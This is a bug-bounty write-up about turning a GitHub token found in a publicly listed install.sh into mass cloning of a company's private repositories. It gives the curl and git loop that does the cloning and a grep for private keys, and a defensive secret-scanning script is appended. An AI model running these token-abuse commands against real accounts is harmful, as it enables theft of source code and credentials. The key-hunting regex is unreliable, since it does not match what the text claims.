Full structure takeover of many brands of a company

Note: this private program is hosted on the Bugcrowd platform and has many brands

While testing this program I brute-forced directories and found this directory listing: http://sub.target.com/scripts

While analysing these files I found an interesting token in the [install.sh] file

This is a GitHub access token, [d42e9078e94930************], but first I want to verify whether this token is valid or expired, because when a developer creates this token they can choose a time for it to expire automatically, like this ..

Let's try to verify

You should request a URL like this by browser or curl, and then the response either matches the repositories or shows that it was expired ..

Amazing!! I can list private repositories to clone, but I can't report it without making sure whether that data is related to the company or not, because maybe this developer just works part-time at the company, so I will clone the private repositories and analyse them, let's go

curl "https://api.github.com/orgs/<username>/repos?access_token=<token>" | grep '\"name\"' | cut -d ":" -f 2 | cut -d '"' -f 2 > privare_repos_name.txt
for repo in $(cat privare_repos_name.txt); do git clone "https://<access-token>@github.com/<username>/$repo"; done

This bash code clones all the private repositories to my VPS, and then I go on to analyse them

I found 5.4G of repositories, OMG..

I can't analyse this amount of data in a short time, so I will use the grep command to get sensitive data

# Grep command for private SSH keys (-P enables the Perl-style lookaheads the pattern uses)
grep -rP '(?=[-]*(?=[A-Z]*(?=[-])))(.*)(?=[-]*(?=[A-Z]*(?=[-])))' .

This regex extracts private SSH keys from all repositories, very nice

In this file I found many creds, and I found many Docker connections, but I can't do this because it's out of scope for the program, because the program says not to try to connect to databases or internal structure

But I have more than 15 private repositories related to 15 brands :)

In every repo I found [panel passwords, backup databases, full application code, cloud creds], and I could connect and take over all brands

Also, business impact

I reached all [product architecture, product layouts], but sorry, I can't share this, to preserve the confidentiality of company data
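Both findings described above, a token hard-coded in a web-exposed install.sh and private keys committed to repositories, are what a scan on the owner's side should catch before a scripts directory is published. The following is an added example, not code from the original writeup; the rule names, the patterns and the sample file are assumptions constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Patterns are assumptions about what a leaked credential looks like in deploy scripts.
RULES = {
    "github-token-prefixed": re.compile(r"\b(?:gh[pousr]_[A-Za-z0-9]{36,}|github_pat_[A-Za-z0-9_]{22,})"),
    # A bare 40-hex string is also a commit SHA, so require a token-like name before it.
    "hex-token-assignment": re.compile(r"(?i)(?:token|secret|api_?key)\w*\s*[=:]\s*['\"]?([0-9a-f]{40})\b"),
    "credential-in-git-url": re.compile(r"https://([^/\s:@]+(?::[^/\s@]+)?)@github\.com/"),
    "private-key-block": re.compile(r"-----BEGIN (?:[A-Z]+ )*PRIVATE KEY-----"),
}

# Constructed sample input (placeholder values), not the install.sh from the writeup.
SAMPLE_INSTALL_SH = """\
#!/bin/sh
GITHUB_TOKEN=0123456789abcdef0123456789abcdef01234567
git clone https://deploy-bot:0123456789abcdef0123456789abcdef01234567@github.com/example-org/app.git
echo "-----BEGIN OPENSSH PRIVATE KEY-----" > /root/.ssh/id_ed25519
COMMIT=89abcdef0123456789abcdef0123456789abcdef
"""

def scan_text(text, source="<sample>"):
    """Return (source, line number, rule, redacted preview) for every match."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pattern in RULES.items():
            for m in pattern.finditer(line):
                secret = m.group(m.lastindex or 0)
                # Never echo the secret itself into scan output or CI logs.
                preview = secret if rule == "private-key-block" else secret[:4] + "****"
                findings.append((source, lineno, rule, preview))
    return findings

def scan_tree(root):
    """Scan every regular file under root, skipping .git metadata."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and ".git" not in path.parts:
            findings += scan_text(path.read_text(errors="ignore"), str(path))
    return findings

if __name__ == "__main__":
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_text(SAMPLE_INSTALL_SH)
    for source, lineno, rule, preview in hits:
        print(f"{source}:{lineno}: {rule}: {preview}")
    sys.exit(1 if hits else 0)  # non-zero exit fails a CI or pre-deploy step
```

Any hit means the credential should be revoked and reissued, not only deleted from the file, since the file may already have been fetched or committed.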
